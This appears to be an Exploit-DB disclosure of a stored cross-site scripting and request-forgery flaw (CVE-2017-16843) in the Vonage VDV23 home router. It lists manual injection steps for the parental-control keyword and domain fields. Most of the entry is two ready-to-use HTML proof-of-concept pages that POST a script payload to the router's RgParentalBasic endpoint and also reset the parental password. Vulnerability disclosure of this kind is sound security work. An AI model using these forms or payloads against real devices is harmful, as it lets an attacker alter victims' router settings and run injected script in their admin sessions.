Vonage VDV23 – Cross-Site Scripting

  • Author: Nu11By73
    Date: 2017-11-16
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/43150/
  • # Exploit Title: Vonage Home Router – Stored XSS
    # Date: 16/11/2017
    # Exploit Author: Nu11By73
    # Hardware Version: VDV-23: 115
    # Software Version: 3.2.11-0.9.40
    # CVE : CVE-2017-16843
    
    
    
    NewKeyword Parameter:
    
    1. Login to the router
    2. Click advanced setup
    3. Click parental controls
    4. In the block these keywords text box enter: test"><script>alert(1)</script>
    5. Click the add keyword button to receive the pop up. 
    
    
    NewDomain Parameter:
    
    1. Login to the router
    2. Click advanced setup
    3. Click parental controls
    4. In the block these websites text box enter: test"><script>alert(1)</script>
    5. Click the add domain button to receive the pop up.
    
    Proof of concept code:
    
    NewDomain.html
    <!-- Note: The x and y values will need to be changed accordingly -->
    <html>
    <p>Authenticated Stored CSRF/XSS - Vonage Modem</p>
    <form method="POST" action="http://192.168.15.1/goform/RgParentalBasic">
    <input type="hidden" name="RemoveContentRule" value="0" />
    <input type="hidden" name="AddContentRule" value="0" />
    <input type="hidden" name="ContentRules" value="0" />
    <input type="hidden" name="RuleSelect" value="0" />
    <input type="hidden" name="NewKeyword" value="" />
    <input type="hidden" name="KeywordAction" value="0" />
    <input type="hidden" name="NewDomain" value="test'><script>alert(1)</script>" />
    <input type="hidden" name="x" value="50" />
    <input type="hidden" name="y" value="15" />
    <input type="hidden" name="DomainAction" value="1" />
    <input type="hidden" name="AllowedDomainAction" value="0" />
    <input type="hidden" name="ParentalPassword" value="Broadcom" />
    <input type="hidden" name="ParentalPasswordReEnter" value="Broadcom" />
    <input type="hidden" name="AccessDuration" value="30" />
    <input type="submit" title="Exploit" />
    </form>
    </html>
    
    NewKeyword.html
    <!-- Note: The x and y values will need to be changed accordingly -->
    <html>
    <p>Authenticated Stored CSRF/XSS - Vonage Modem</p>
    <form method="POST" action="http://192.168.15.1/goform/RgParentalBasic">
    <input type="hidden" name="RemoveContentRule" value="0" />
    <input type="hidden" name="AddContentRule" value="0" />
    <input type="hidden" name="ContentRules" value="0" />
    <input type="hidden" name="RuleSelect" value="0" />
    <input type="hidden" name="NewKeyword" value="test'><script>alert(1)</script>" />
    <input type="hidden" name="x" value="61" />
    <input type="hidden" name="y" value="12" />
    <input type="hidden" name="KeywordAction" value="1" />
    <input type="hidden" name="NewDomain" value="" />
    <input type="hidden" name="DomainAction" value="0" />
    <input type="hidden" name="AllowedDomainAction" value="0" />
    <input type="hidden" name="ParentalPassword" value="Broadcom" />
    <input type="hidden" name="ParentalPasswordReEnter" value="Broadcom" />
    <input type="hidden" name="AccessDuration" value="30" />
    <input type="submit" title="Enable Service" />
    </form>
    </html>